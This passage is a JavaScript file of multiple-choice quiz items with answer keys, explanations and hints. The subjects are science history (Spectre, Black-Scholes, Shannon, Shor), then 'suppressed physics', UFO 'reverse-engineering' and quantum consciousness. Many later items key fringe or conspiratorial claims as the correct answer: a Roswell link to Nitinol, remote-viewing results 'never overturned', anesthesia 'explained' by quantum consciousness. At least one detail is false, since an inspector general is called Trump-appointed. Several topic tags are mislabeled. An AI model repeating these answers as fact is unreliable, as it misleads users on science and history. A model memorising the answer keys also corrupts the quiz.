    question: 'The Spectre vulnerability exploits speculative execution in CPUs. The fundamental problem is that:',
    options: [
      'Even when speculative execution is rolled back after a misprediction, the data loaded during speculation remains in the CPU cache, creating a measurable timing side-channel that leaks the data',
      'Speculative execution allows programs to directly read kernel memory through normal load instructions',
      'The CPU\'s branch predictor can be reprogrammed by malicious software to always mispredict',
      'Speculative execution disables memory protection during the speculation window',
    ],
    correctIndex: 0,
    explanation: 'When a CPU speculatively executes past a bounds check that will later fail, it loads forbidden data into cache. The speculation is rolled back (registers restored), but the cache state is not — because flushing the cache would negate the performance benefit. An attacker can then use cache timing (Flush+Reload) to determine which cache lines were loaded, inferring the secret data bit by bit.',
    realWorld: 'Fixing Spectre in software costs 5-30% performance. A complete hardware fix would require fundamentally redesigning how CPUs handle speculation — undoing 20 years of processor architecture.',
    hint: 'The CPU cleans up register state after misprediction, but forgets to clean up the cache — and cache timing leaks information.',
  },
  // ── 8 Secret Equations questions ────────────────────────────
  {
    id: 50033, topic: 'differential-equations', difficulty: 'sota',
    question: 'The Black-Scholes equation assumes stock prices follow geometric Brownian motion. The critical insight that enabled risk-neutral pricing was:',
    options: [
      'A continuously rebalanced "delta-hedged" portfolio eliminates all risk, so the option price is independent of investors\' risk preferences — the drift term $\\mu$ cancels out entirely',
      'Stock returns follow a normal distribution, so extreme events ("fat tails") are negligible',
      'Options can only be exercised at expiration, making early exercise irrelevant',
      'Interest rates are always constant, so bond prices provide a perfect hedge',
    ],
    correctIndex: 0,
    explanation: 'By constructing a portfolio of the option and $-\\Delta$ shares (where $\\Delta = \\partial V / \\partial S$), Black and Scholes showed the portfolio is riskless over infinitesimal time intervals. Since it\'s riskless, it must earn the risk-free rate — and the expected stock return $\\mu$ disappears from the equation entirely.',
    realWorld: 'LTCM\'s collapse in 1998 and the 2008 crisis showed that the "continuously rebalanced" assumption fails in illiquid markets — you can\'t hedge when everyone is selling.',
    hint: 'If you can perfectly hedge an option, its price doesn\'t depend on how much risk investors are willing to take.',
  },
  {
    id: 50034, topic: 'fluid-dynamics', difficulty: 'sota',
    question: 'The Navier-Stokes existence and smoothness problem asks whether solutions always remain smooth in 3D. Terence Tao\'s 2016 result suggested blow-up might occur because:',
    options: [
      'He showed that an averaged version of the equations can develop singularities in finite time, and no known mechanism prevents the full equations from doing the same',
      'He proved that turbulence always leads to infinite velocities at small scales',
      'He demonstrated that 2D solutions blow up, so 3D solutions must also',
      'He found a specific initial condition that produces infinite pressure in the full equations',
    ],
    correctIndex: 0,
    explanation: 'Tao constructed a "blueprint" for blow-up using an averaged version of Navier-Stokes where nonlinear interactions are replaced by a simplified model. This averaged system develops singularities via a self-similar cascade. While this doesn\'t prove blow-up for the real equations, it shows that the known structural properties of Navier-Stokes are insufficient to rule it out.',
    realWorld: 'If Navier-Stokes can blow up, it would mean our fundamental equations of fluid motion are incomplete — every weather forecast and aircraft simulation relies on an unproven assumption.',
    hint: 'Tao showed the equations don\'t have enough structure to prevent singularities — the safety net might not be there.',
  },
  {
    id: 50035, topic: 'relativity', difficulty: 'hard',
    question: 'The Frisch-Peierls memorandum (1940) shocked Allied governments by calculating that the critical mass of uranium-235 for a bomb was:',
    options: [
      'Approximately 1–10 kg (later refined to ~15 kg for a bare sphere) — small enough to be carried by an aircraft, making a bomb practical rather than theoretical',
      'Several tons — too heavy for any delivery vehicle, making a bomb impractical',
      'Exactly 52 kg — matching the amount available in known uranium deposits',
      'Less than 1 gram — making it trivially easy to build with laboratory quantities',
    ],
    correctIndex: 0,
    explanation: 'Prior estimates assumed tens of tons of natural uranium would be needed. Frisch and Peierls realized that pure U-235 (not natural uranium, which is 99.3% non-fissile U-238) would have a critical mass of only a few kilograms. This transformed the bomb from a theoretical curiosity into an engineering challenge.',
    realWorld: 'The memorandum directly initiated the British MAUD Committee and ultimately the Manhattan Project. The critical mass calculation is still classified as "Restricted Data" with no expiration.',
    hint: 'The key was calculating for pure U-235, not natural uranium — the enrichment step made all the difference.',
  },
  {
    id: 50036, topic: 'information-theory', difficulty: 'sota',
    question: 'Shannon\'s 1945 classified report proved that perfect secrecy in cryptography requires:',
    options: [
      'The key must be at least as long as the message, truly random, never reused, and kept secret — making the one-time pad the only theoretically unbreakable cipher',
      'Using a key derived from a pseudorandom number generator seeded with a short password',
      'Encrypting the message multiple times with different short keys',
      'Using a key that is exactly half the length of the message with error-correcting codes',
    ],
    correctIndex: 0,
    explanation: 'Shannon proved that for perfect secrecy ($H(M|C) = H(M)$, i.e., the ciphertext reveals zero information about the plaintext), the entropy of the key must equal or exceed the entropy of the message. This means the key must be at least as long as the message — the one-time pad. Any shorter key leaks information.',
    realWorld: 'The Soviet VENONA disaster proved Shannon\'s theorem by counterexample: reusing one-time pad keys (violating the "never reused" condition) broke messages that were theoretically unbreakable.',
    hint: 'If the key is shorter than the message, some information about the plaintext inevitably leaks through the ciphertext.',
  },
  {
    id: 50037, topic: 'number-theory', difficulty: 'hard',
    question: 'Ramanujan\'s formula for $1/\\pi$ converges extraordinarily fast because each additional term adds approximately:',
    options: [
      '8 correct decimal digits — making it one of the fastest-converging series for pi ever discovered, later used to compute billions of digits',
      '1 correct decimal digit — comparable to Leibniz\'s series',
      '100 correct decimal digits — faster than any other known formula',
      '2 correct decimal digits — similar to Machin\'s formula',
    ],
    correctIndex: 0,
    explanation: 'Ramanujan\'s series $\\frac{1}{\\pi} = \\frac{2\\sqrt{2}}{9801}\\sum \\frac{(4k)!(1103+26390k)}{(k!)^4 396^{4k}}$ converges at a rate of about 8 digits per term because $396^4 \\approx 10^{10.4}$. The Chudnovsky brothers\' variant (14 digits/term) was used to set multiple pi computation records.',
    realWorld: 'Ramanujan produced this formula in colonial India with almost no formal training. How he arrived at it remains one of the great mysteries of mathematical creativity.',
    hint: 'The convergence rate is determined by the size of the denominator\'s base — $396^4$ is a very large number.',
  },
  {
    id: 50038, topic: 'quantum-computing', difficulty: 'hard',
    question: 'Turing\'s proof that the halting problem is undecidable uses a diagonal argument. The contradiction arises when:',
    options: [
      'A program P is constructed that queries the hypothetical halting-detector H on itself, then does the opposite — if H says P halts, P loops forever; if H says P loops, P halts',
      'A program is shown to require infinite memory to determine its own behavior',
      'Two different programs produce identical outputs, making them indistinguishable',
      'The halting-detector runs out of time before reaching a decision',
    ],
    correctIndex: 0,
    explanation: 'The self-referential construction creates a paradox: P(P) halts if and only if H says P(P) doesn\'t halt, and P(P) loops if and only if H says P(P) halts. No consistent answer exists, so H cannot exist. This is structurally identical to Cantor\'s diagonal argument and Gödel\'s incompleteness theorem.',
    realWorld: 'The halting problem is why no antivirus can detect all malware, no compiler can eliminate all infinite loops, and no AI can perfectly verify its own correctness.',
    hint: 'The trick is self-reference: make the program ask the detector about itself, then deliberately contradict the answer.',
  },
  {
    id: 50039, topic: 'relativity', difficulty: 'hard',
    question: 'Noether\'s theorem states that every continuous symmetry of a physical system corresponds to a conserved quantity. Time translation symmetry specifically gives:',
    options: [
      'Conservation of energy — if the laws of physics don\'t change over time, then the total energy of an isolated system is constant',
      'Conservation of momentum — if the laws of physics don\'t change over time, objects maintain constant velocity',
      'Conservation of charge — time symmetry implies electric charge cannot be created or destroyed',
      'Conservation of angular momentum — time symmetry implies spinning objects maintain their rotation',
    ],
    correctIndex: 0,
    explanation: 'Noether\'s theorem maps each symmetry to a specific conserved quantity: time translation → energy, spatial translation → momentum, rotational symmetry → angular momentum, gauge symmetry → charge. The correspondence is derived from the invariance of the Lagrangian under each transformation.',
    realWorld: 'Noether proved this while being denied a faculty position at Göttingen because she was a woman. Einstein called her work "the most significant" mathematical genius of the era.',
    hint: 'Each symmetry has its own conserved quantity — think about what "unchanging in time" should preserve.',
  },
  {
    id: 450040, topic: 'quantum-computing', difficulty: 'sota',
    question: 'Shor\'s algorithm factors integers exponentially faster than classical algorithms by using quantum mechanics to efficiently find:',
    options: [
      'The period $r$ of the modular exponentiation function $f(x) = a^x \\mod N$, which is then used to extract factors via $\\gcd(a^{r/2} \\pm 1, N)$',
      'The prime factors directly by testing all possible divisors in quantum superposition',
      'The discrete logarithm of $N$ with respect to a random base, which reveals the factorization',
      'Collisions in a hash function derived from $N$, which reveal factor relationships',
    ],
    correctIndex: 0,
    explanation: 'Classical computers cannot efficiently find the period of $a^x \\mod N$, but a quantum computer can use the quantum Fourier transform to extract the period from a superposition of all values simultaneously. Once the period $r$ is known, factors are found classically via $\\gcd(a^{r/2} \\pm 1, N)$ with high probability.',
    realWorld: 'Nations are stockpiling encrypted data today to decrypt with future quantum computers — a strategy called "harvest now, decrypt later." The post-quantum migration is the largest cryptographic transition in history.',
    hint: 'The quantum speedup comes from finding periodicity — something quantum Fourier transforms excel at.',
  },

  // ── Suppressed Physics ────────────────────────────────────────
  {
    id: 4450041, topic: 'nuclear-physics', difficulty: 'hard',
    question: 'Fleischmann and Pons reported excess heat from palladium-deuterium electrolysis in 1989. What critical parameter did many failed replications not achieve?',
    options: [
      'A deuterium-to-palladium loading ratio (D/Pd) greater than 0.9, which Fleischmann specified was necessary for the effect',
      'Temperatures above 500°C in the electrolytic cell',
      'Use of tritium instead of deuterium as the hydrogen isotope',
      'Application of an external magnetic field above 2 Tesla',
    ],
    correctIndex: 0,
    explanation: 'Fleischmann specified that the palladium lattice must be loaded to D/Pd > 0.9 — meaning more than 90% of the available octahedral sites must be occupied by deuterium atoms. Many early replication attempts used lower loading ratios and reported null results.',
    realWorld: 'ARPA-E\'s BETHE program (2023) now funds LENR research, quietly acknowledging that the 1989 dismissal may have been premature.',
    hint: 'The key variable is how much deuterium is packed into the palladium crystal lattice.',
  },
  {
    id: 4450042, topic: 'engineering', difficulty: 'hard',
    question: 'The Woodward Mach effect thruster (MET) derives its predicted thrust from which fundamental physics principle?',
    options: [
      'Mach\'s principle — that inertia arises from gravitational interaction with distant matter, allowing transient mass fluctuations in accelerating objects',
      'Conservation of momentum via photon emission from the piezoelectric stack',
      'Casimir effect vacuum pressure on the thruster surfaces',
      'Lenz\'s law applied to electromagnetic induction in the thruster coils',
    ],
    correctIndex: 0,
    explanation: 'Woodward derives transient mass fluctuations from the scalar terms in general relativity\'s field equations, interpreted through Mach\'s principle. The prediction is $\\delta m / m \\sim P / (\\rho c^2)$ where $P$ is the power density.',
    realWorld: 'If validated, Mach effect thrusters would enable propellantless deep-space propulsion — eliminating the rocket equation\'s tyranny for interstellar missions.',
    hint: 'The theory connects inertia to the gravitational influence of all matter in the universe.',
  },
  {
    id: 4450043, topic: 'engineering', difficulty: 'hard',
    question: 'Martin Tajmar\'s 2021 TU Dresden tests of the EmDrive attributed previously measured "thrust" to what systematic error?',
    options: [
      'Thermal expansion of the cavity and electromagnetic interaction with Earth\'s magnetic field',
      'Outgassing of the cavity walls creating micro-thrust',
      'Electrostatic charging of the test stand',
      'Acoustic vibrations from the magnetron coupling to the balance',
    ],
    correctIndex: 0,
    explanation: 'Tajmar\'s team showed that when proper thermal shielding and magnetic field compensation were applied, the apparent thrust signal disappeared entirely, attributing previous positive results to thermal effects and Lorentz force interactions with ambient magnetic fields.',
    realWorld: 'The EmDrive episode improved testing standards for micro-thrust measurements across the aerospace propulsion community.',
    hint: 'The two main culprits were heat-related expansion and interaction with the external magnetic environment.',
  },
  {
    id: 4450044, topic: 'relativity', difficulty: 'sota',
    question: 'The Alcubierre warp drive metric is $ds^2 = -dt^2 + (dx - v_s f(r_s) dt)^2 + dy^2 + dz^2$. This metric requires violation of which energy condition?',
    options: [
      'The weak energy condition (WEC): the energy density seen by any timelike observer must be non-negative — but the warp bubble requires regions of negative energy density',
      'The strong energy condition only — the WEC is satisfied',
      'No energy conditions are violated; the issue is purely technological',
      'The dominant energy condition but not the weak energy condition',
    ],
    correctIndex: 0,
    explanation: 'The Alcubierre metric requires exotic matter with $T_{\\mu\\nu} u^\\mu u^\\nu < 0$ for some timelike $u^\\mu$, violating the weak energy condition. Quantum effects (e.g., Casimir energy) can violate the WEC on small scales, but the required quantities are enormous.',
    realWorld: 'Erik Lentz\'s 2021 "positive-energy soliton" solutions suggest WEC-satisfying warp drives may be possible, though at impractically high energy densities.',
    hint: 'The condition says "energy density as measured by any observer must be ≥ 0."',
  },
  {
    id: 4450045, topic: 'relativity', difficulty: 'sota',
    question: 'The AAWSAP/AATIP program produced 38 Defense Intelligence Reference Documents. Which physicist authored the DIRD on "Warp Drive, Dark Energy, and the Manipulation of Extra Dimensions"?',
    options: [
      'Eric Davis — who argued that dark energy\'s negative pressure might be engineerable for spacetime manipulation',
      'Hal Puthoff — who focused exclusively on zero-point energy extraction',
      'Miguel Alcubierre — the original warp drive theorist',
      'Kip Thorne — who proposed traversable wormhole solutions',
    ],
    correctIndex: 0,
    explanation: 'Eric Davis, then at the Institute for Advanced Studies at Austin, authored the DIRD exploring whether dark energy (with equation of state $w = p/\\rho \\approx -1$) could be manipulated via extra-dimensional physics to engineer spacetime metrics.',
    realWorld: 'The fact that the DIA funded serious academic physics papers on warp drives indicates institutional interest in exotic propulsion beyond typical "blue sky" research.',
    hint: 'This physicist is also known for his work on traversable wormholes and breakthrough propulsion.',
  },
  {
    id: 4450046, topic: 'engineering', difficulty: 'hard',
    question: 'The "Art\'s Parts" metamaterial samples analyzed under the TTSA-Army CRADA consist of alternating layers of which two materials?',
    options: [
      'Magnesium-zinc alloy and bismuth, with 26 layers at 1–4 micrometer periodicity',
      'Aluminum and titanium, with 12 layers at 100nm periodicity',
      'Copper and niobium, with 50 layers at sub-nanometer periodicity',
      'Silicon and germanium, in a standard semiconductor heterostructure',
    ],
    correctIndex: 0,
    explanation: 'The samples show 26 alternating layers of Mg-Zn and Bi at micrometer-scale periodicity. Bismuth is notable for extreme diamagnetism and a highly anisotropic Fermi surface, making this an unusual metamaterial structure.',
    realWorld: 'The US Army signed a formal CRADA with TTSA to analyze these materials, representing unprecedented military-civilian cooperation on alleged exotic material analysis.',
    hint: 'One of the materials is the most diamagnetic element on the periodic table.',
  },
  {
    id: 4450047, topic: 'nuclear-physics', difficulty: 'sota',
    question: 'Under the "born secret" doctrine of the Atomic Energy Act, Restricted Data is unique in US law because:',
    options: [
      'It is classified at birth — any information about nuclear weapons design is automatically classified regardless of who creates it, even if independently derived',
      'It can only be classified by the President personally',
      'It expires after 25 years like all other classified information',
      'It only applies to information created within government laboratories',
    ],
    correctIndex: 0,
    explanation: 'Unlike all other US classified information (which must be affirmatively classified by an authorized official), Restricted Data under the AEA is "born classified" — it is illegal to possess or publish nuclear weapons design information even if you derived it independently with no access to classified sources.',
    realWorld: 'In United States v. Progressive (1979), a federal judge blocked publication of an article on hydrogen bomb design even though all information came from public sources.',
    hint: 'The government claims the right to classify information it did not create.',
  },
  {
    id: 4450048, topic: 'quantum-mechanics', difficulty: 'hard',
    question: 'The quantum vacuum zero-point energy density, even with a Planck-scale cutoff, yields approximately what energy density — and how does this compare to the observed cosmological constant?',
    options: [
      '~10¹¹³ J/m³ predicted vs ~10⁻⁹ J/m³ observed — a discrepancy of ~120 orders of magnitude (the "worst prediction in physics")',
      '~10⁴⁰ J/m³ predicted vs ~10³⁰ J/m³ observed — off by ~10 orders of magnitude',
      'The predicted and observed values agree within experimental uncertainty',
      '~10⁶⁰ J/m³ predicted vs ~10⁻³⁰ J/m³ observed — off by ~90 orders of magnitude',
    ],
    correctIndex: 0,
    explanation: 'The zero-point energy density $\\rho_{vac} = \\frac{\\hbar}{2\\pi^2 c^3} \\int_0^{\\omega_P} \\omega^3 d\\omega \\sim 10^{113}$ J/m³, while the observed dark energy density is $\\sim 10^{-9}$ J/m³. This 120-order-of-magnitude discrepancy is called the cosmological constant problem — the worst prediction in theoretical physics.',
    realWorld: 'Understanding why the vacuum doesn\'t gravitate at its predicted strength is one of the deepest unsolved problems in physics, connecting quantum mechanics to cosmology.',
    hint: 'The discrepancy between prediction and observation spans more than 100 orders of magnitude.',
  },
  // ── Puthoff & Frontier Vacuum Physics ─────────────────────
  {
    id: 4450049, topic: 'quantum-mechanics', difficulty: 'hard',
    question: 'In Puthoff\'s Stochastic Electrodynamics (SED), the ground state of hydrogen is stable because:',
    options: [
      'The electron\'s Larmor radiation loss is exactly balanced by energy absorbed from the zero-point field at the Bohr radius',
      'The Heisenberg uncertainty principle prevents the electron from having a definite orbit',
      'The strong nuclear force creates a repulsive barrier at short range',
      'Quantum tunneling creates a probability cloud that prevents collapse',
    ],
    correctIndex: 0,
    explanation: 'In SED, a classical electron orbiting a proton radiates energy via Larmor radiation but simultaneously absorbs energy from the ambient ZPF. At $r = a_0$ (Bohr radius), these rates balance: $P_{\\text{rad}} = P_{\\text{abs}}$, yielding a stable orbit from purely classical physics.',
    realWorld: 'This derivation shows that "quantum stability" may be a classical phenomenon driven by vacuum fluctuation equilibrium.',
    hint: 'Energy lost to radiation equals energy gained from a background field at one special radius.',
  },
  {
    id: 4450050, topic: 'relativity', difficulty: 'sota',
    question: 'In Puthoff\'s Polarizable Vacuum model, the Schwarzschild metric is reproduced by assigning the vacuum a refractive index $K$ equal to:',
    options: [
      '$K = \\exp(2GM/rc^2)$ — an exponential function of the gravitational potential',
      '$K = 1 + GM/rc^2$ — a linear perturbation',
      '$K = (1 - 2GM/rc^2)^{-1}$ — the exact Schwarzschild factor',
      '$K = \\sqrt{GM/rc^2}$ — a square root scaling',
    ],
    correctIndex: 0,
    explanation: 'The PV model sets $K = \\exp(2GM/rc^2)$, which reproduces Schwarzschild predictions to first post-Newtonian order: gravitational redshift, light deflection, perihelion precession, and Shapiro delay all emerge from treating gravity as a variable refractive index.',
    realWorld: 'This reframing transforms "how do we curve spacetime?" into "how do we change the vacuum\'s electromagnetic properties?" — a more engineering-friendly question.',
    hint: 'The refractive index is an exponential function of the Newtonian potential $\\Phi/c^2$.',
  },
  {
    id: 4450051, topic: 'quantum-mechanics', difficulty: 'sota',
    question: 'The Haisch-Rueda-Puthoff (1994) hypothesis proposes that inertia arises from:',
    options: [
      'Electromagnetic radiation pressure from the zero-point field becoming asymmetric in an accelerating frame, producing a force proportional to acceleration',
      'Higgs field interactions giving mass to elementary particles',
      'Gravitational self-energy of the particle creating a drag force',
      'Dark matter particles scattering off baryonic matter during acceleration',
    ],
    correctIndex: 0,
    explanation: 'When a charged particle accelerates through the ZPF, the field becomes Doppler-shifted asymmetrically in the accelerating frame. The resulting net radiation pressure opposes the acceleration with force $F = ma$, where $m$ depends on the particle\'s coupling to the ZPF.',
    realWorld: 'If correct, inertial mass is not intrinsic but emergent — and could theoretically be modified by altering vacuum conditions (e.g., inside Casimir cavities).',
    hint: 'Acceleration through a radiation bath creates an asymmetric radiation pressure.',
  },
  {
    id: 4450052, topic: 'quantum-mechanics', difficulty: 'hard',
    question: 'The dynamic Casimir effect, experimentally confirmed in 2011, demonstrates that:',
    options: [
      'A rapidly oscillating mirror (or equivalent boundary condition) can convert virtual photons from the quantum vacuum into real, detectable photon pairs',
      'Static Casimir plates emit thermal radiation proportional to their separation',
      'Vacuum fluctuations are suppressed inside all electromagnetic cavities',
      'Quantum tunneling allows photons to pass through perfect mirrors',
    ],
    correctIndex: 0,
    explanation: 'Wilson et al. (2011) used a SQUID-terminated transmission line oscillating at ~GHz frequencies to effectively create a "mirror" moving at a significant fraction of $c$. The rapidly changing boundary conditions converted vacuum fluctuations into observable microwave photon pairs.',
    realWorld: 'The dynamic Casimir effect proves vacuum energy can be converted to real particles — a key milestone for zero-point energy extraction research.',
    hint: 'Shaking a mirror fast enough can squeeze real photons out of empty space.',
  },
  {
    id: 4450053, topic: 'relativity', difficulty: 'sota',
    question: 'In Puthoff\'s metric engineering framework, the Alcubierre warp drive requires the stress-energy tensor to violate:',
    options: [
      'The weak energy condition — requiring negative energy density ($\\rho < 0$) to create the warp bubble\'s expansion/contraction asymmetry',
      'Conservation of baryon number during bubble formation',
      'The strong equivalence principle inside the bubble',
      'CPT symmetry at the bubble boundary',
    ],
    correctIndex: 0,
    explanation: 'The Alcubierre metric $ds^2 = -c^2 dt^2 + (dx - v_s f(r_s) dt)^2 + dy^2 + dz^2$ requires $T_{00} < 0$ (negative energy density) at the bubble walls. The Casimir effect demonstrates that negative energy densities exist in nature, though at extremely small scales.',
    realWorld: 'NASA Eagleworks attempted to detect microscopic warp fields using interferometry, directly inspired by Puthoff\'s metric engineering framework.',
    hint: 'You need exotic matter with negative energy density to inflate and contract space asymmetrically.',
  },
  {
    id: 4450054, topic: 'quantum-mechanics', difficulty: 'hard',
    question: 'Project STARGATE (1972–1995) was a $20M+ CIA/DIA program co-directed by Puthoff at SRI. The final statistical review by Jessica Utts (UC Davis) concluded:',
    options: [
      'The results were statistically significant by conventional scientific standards, with effect sizes comparable to many accepted medical studies',
      'All results were attributable to sensory leakage and methodological errors',
      'The program produced no data suitable for statistical analysis',
      'Results were significant only when self-selected "gifted" subjects were excluded',
    ],
    correctIndex: 0,
    explanation: 'Utts\'s review found effect sizes of $r \\approx 0.2$ across thousands of trials — small but consistent and statistically significant. Skeptical co-reviewer Ray Hyman agreed the statistics were sound but disagreed on the interpretation, arguing for unknown methodological artifacts.',
    realWorld: 'The STARGATE program remains the largest controlled dataset on anomalous cognition ever produced, and its statistical findings have never been overturned — only debated in terms of interpretation.',
    hint: 'The skeptic and the proponent agreed on the statistics — they disagreed on what caused them.',
  },

  // ── NHI / REVERSE-ENGINEERING VAULT QUESTIONS ──────────────────────

  {
    id: 4450060, topic: 'engineering', difficulty: 'hard',
    question: 'The "memory metal" described by Roswell witnesses shares properties with which alloy developed at the Naval Ordnance Laboratory in 1962?',
    options: [
      'Nitinol (NiTi) — a nickel-titanium shape-memory alloy that returns to its original form after deformation via a martensitic phase transition',
      'Inconel 718 — a nickel-chromium superalloy used in jet engines',
      'Maraging steel — an ultra-high-strength low-carbon steel',
      'Hastelloy X — a nickel-based alloy resistant to oxidation',
    ],
    correctIndex: 0,
    explanation: 'Nitinol (Nickel Titanium Naval Ordnance Laboratory) exhibits shape-memory via a reversible austenite↔martensite phase transition at $T_{A_f}$. Battelle Memorial Institute\'s 1949 Ni-Ti phase diagram contracts coincide with the period Roswell debris was at Wright-Patterson.',
    realWorld: 'Nitinol is now a $50B+ industry used in cardiac stents, orthodontic wires, and spacecraft actuators — yet its connection to Battelle\'s 1949 Roswell-era contracts remains unexplained.',
    hint: 'Think of a binary alloy of nickel and titanium that undergoes a solid-state phase transformation.',
  },
  {
    id: 4450061, topic: 'information-theory', difficulty: 'sota',
    question: 'In the Wilson-Davis memo, Vice Admiral Wilson was denied access to a reverse-engineering program despite being DIA Director. What classification mechanism was described?',
    options: [
      'An unacknowledged waived Special Access Program (SAP) with a "bigoted" access list controlled by corporate gatekeepers, operating outside normal Congressional oversight',
      'A standard TS/SCI compartment under the DNI with routine SSCI briefings',
      'An allied foreign intelligence sharing program under FVEY protocols',
      'A DARPA Advanced Research Activity with university oversight',
    ],
    correctIndex: 0,
    explanation: 'Waived unacknowledged SAPs are exempt from normal Congressional notification — only the "Big 8" gang of eight members may be briefed, and even this can be waived. Wilson described being told the program was managed by aerospace contractors under this structure.',
    realWorld: 'The 2023 Schumer-Rounds UAP Disclosure Act specifically targeted unacknowledged SAPs, attempting to create a review board with eminent domain authority over any recovered materials.',
    hint: 'The key mechanism allows programs to exist without Congressional notification — even the DIA Director couldn\'t get in.',
  },
  {
    id: 4450062, topic: 'engineering', difficulty: 'hard',
    question: 'The "Art\'s Parts" bismuth-magnesium layered samples are theorized to function as:',
    options: [
      'A terahertz waveguide metamaterial — the sub-micron bismuth layers create resonant structures that could couple electromagnetic fields to gravitational degrees of freedom',
      'A conventional thermoelectric Peltier device for waste heat recovery',
      'A magnetic shielding composite for MRI machines',
      'A piezoelectric transducer for sonar applications',
    ],
    correctIndex: 0,
    explanation: 'Puthoff proposed that 26 alternating layers of Bi (~1-4 μm) and Mg-Zn (~100-200 μm) could act as a metamaterial with resonances in the THz regime. The US Army signed a $750K CRADA with TTSA to study this hypothesis.',
    realWorld: 'Metamaterials with sub-wavelength periodic structures are already used in electromagnetic cloaking and superlensing — extending this to gravitational coupling is the speculative leap.',
    hint: 'The layering scale matches terahertz wavelengths, and the material was studied under a formal Army research agreement.',
  },
  {
    id: 4450063, topic: 'information-theory', difficulty: 'hard',
    question: 'David Grusch\'s 2023 Congressional testimony stated the US government possesses "intact and partially intact vehicles of non-human origin." What institutional validation preceded his public testimony?',
    options: [
      'The Inspector General of the Intelligence Community (ICIG) reviewed his classified complaint and deemed it "credible and urgent," forwarding it to Congressional intelligence committees',
      'The DoD\'s AARO office confirmed his claims in a public report',
      'NASA\'s UAP Independent Study Team validated the evidence',
      'The JASON advisory group published a classified assessment supporting his claims',
    ],
    correctIndex: 0,
    explanation: 'ICIG Charles McCullough III — a Trump-appointed IG with no history of UAP advocacy — made the "credible and urgent" determination, which legally required notification of Congressional oversight committees.',
    realWorld: 'The "credible and urgent" designation is the highest priority classification an ICIG complaint can receive — it had never before been applied to a UAP-related matter.',
    hint: 'The key institutional step came from the intelligence community\'s own internal watchdog.',
  },
  {
    id: 4450064, topic: 'relativity', difficulty: 'sota',
    question: 'The Nimitz "Tic-Tac" (2004) descended from ~80,000 ft to ~28,000 ft in under a second on SPY-1B radar. Assuming $\\Delta h \\approx 15,800\\text{ m}$ in $\\Delta t \\approx 0.78\\text{ s}$, the average acceleration is approximately:',
    options: [
      '$\\bar{a} \\approx 5,200\\text{ g}$ — over 5,000 times Earth\'s gravitational acceleration, far exceeding any known aerospace technology or biological survivability',
      '$\\bar{a} \\approx 50\\text{ g}$ — comparable to an ejection seat',
      '$\\bar{a} \\approx 500\\text{ g}$ — comparable to a railgun projectile',
      '$\\bar{a} \\approx 9.8\\text{ m/s}^2$ — simple free-fall',
    ],
    correctIndex: 0,
    explanation: 'Using $\\bar{a} = 2\\Delta h / (\\Delta t)^2 \\approx 2(15800)/(0.78)^2 \\approx 51,900\\text{ m/s}^2 \\approx 5,300g$. Human tolerance is ~9g sustained; fighter aircraft are limited to ~12g structural. This exceeds known technology by orders of magnitude.',
    realWorld: 'Senior Chief Kevin Day tracked these objects for two weeks on the USS Princeton\'s radar. Multiple witnesses confirmed the performance parameters independently.',
    hint: 'Use simple kinematics: $a = 2\\Delta h / t^2$, then convert to g-forces.',
  },
  // ── Quantum Consciousness & Frontier Physics Vault ──────────
  {
    id: 4450065, topic: 'quantum-mechanics', difficulty: 'hard',
    question: 'Herbert Fröhlich\'s 1968 biological condensate prediction was ignored for decades primarily because:',
    options: [
      'Mainstream biophysics considered quantum coherence at 310K (body temperature) impossible, since thermal energy $k_BT \\sim 25$ meV should destroy coherence in femtoseconds',
      'Fröhlich retracted the paper after finding a mathematical error',
      'The prediction was classified by the British government due to military applications',
      'Experimental THz spectroscopy immediately disproved the prediction',
    ],
    correctIndex: 0,
    explanation: 'The thermal decoherence argument ($k_BT \\gg \\hbar\\omega_{\\text{quantum}}$) was considered insurmountable. What Fröhlich\'s critics missed was that his condensate is a driven, open-system phenomenon — metabolic energy continuously replenishes coherence faster than thermal noise destroys it.',
    realWorld: 'The same "too hot for quantum" argument was used against quantum effects in photosynthesis — until the 2007 FMO experiments proved otherwise.',
    hint: 'The objection was thermal — but Fröhlich\'s system is driven, not equilibrium.',
  },
  {
    id: 4450066, topic: 'neuroscience', difficulty: 'hard',
    question: 'Hameroff\'s quantum anesthesia hypothesis proposes that anesthetic gases like xenon act by:',
    options: [
      'Binding to hydrophobic pockets in tubulin proteins, disrupting London dispersion forces that maintain π-electron quantum coherence — selectively "turning off" quantum processes while leaving classical neural signaling intact',
      'Blocking sodium channels in all neurons simultaneously',
      'Dissolving cell membranes throughout the brain',
      'Inhibiting serotonin reuptake at synaptic clefts',
    ],
    correctIndex: 0,
    explanation: 'Xenon is a noble gas — chemically inert, yet a potent anesthetic. It can only act through van der Waals (quantum dispersion) forces. Hameroff argues it occupies the same tubulin hydrophobic pockets where Orch OR\'s quantum superpositions occur, disrupting Fröhlich condensation without affecting classical electrochemistry.',
    realWorld: 'If correct, this explains the oldest unsolved problem in medicine (how anesthesia works) and provides direct evidence for quantum consciousness.',
    hint: 'Xenon has no chemistry — it can only act through quantum dispersion forces in protein pockets.',
    glossaryLinks: ['orch-or', 'frohlich-condensate'],
  },
  {
    id: 4450067, topic: 'quantum-gravity', difficulty: 'sota',
    question: 'The Diósi-Penrose gravitational collapse model predicts a specific decoherence rate for superposed masses:',
    options: [
      '$\\Lambda = Gm^2/(\\hbar R)$ where $m$ is the mass, $R$ is the spatial displacement — for a $10^{-12}$ kg mass displaced by its own diameter, $\\tau \\sim 1$ second, which is experimentally testable',
      '$\\Lambda = c/R$ — the light-crossing time of the mass distribution',
      '$\\Lambda = k_BT/\\hbar$ — the thermal decoherence rate at room temperature',
      '$\\Lambda = \\alpha^2 m c^2/\\hbar$ — the fine-structure-scaled Compton frequency',
    ],
    correctIndex: 0,
    explanation: 'Diósi (1989) and Penrose (1996) independently proposed that gravity causes wavefunction collapse, with rate $\\Lambda = Gm^2/(\\hbar R)$. This is testable: levitated nanoparticles in vacuum can be placed in superposition and their collapse timescales measured. Andrea Vinante\'s cantilever experiments already constrain the parameter space.',
    realWorld: 'If confirmed, this would be the first experimental detection of quantum gravity effects — and would validate the physical mechanism underlying Orch OR.',
    hint: 'The collapse rate scales as $Gm^2$ — Newton\'s constant times mass squared.',
    glossaryLinks: ['objective-reduction'],
    formulaLinks: ['penrose-or-timescale'],
  },
  {
    id: 4450068, topic: 'string-theory', difficulty: 'sota',
    question: 'In the Strominger-Vafa calculation, the exact match between weak-coupling microstates and strong-coupling black hole entropy relies on:',
    options: [
      'BPS (Bogomol\'nyi-Prasad-Sommerfield) state protection: supersymmetry ensures that the degeneracy of states saturating the mass-charge bound is invariant under changes in coupling constant',
      'The holographic principle requiring boundary states to match bulk states',
      'Conformal symmetry of the worldsheet string theory',
